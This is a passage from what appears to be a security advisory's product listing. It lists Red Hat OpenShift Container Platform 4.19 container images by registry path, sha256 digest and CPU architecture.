"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
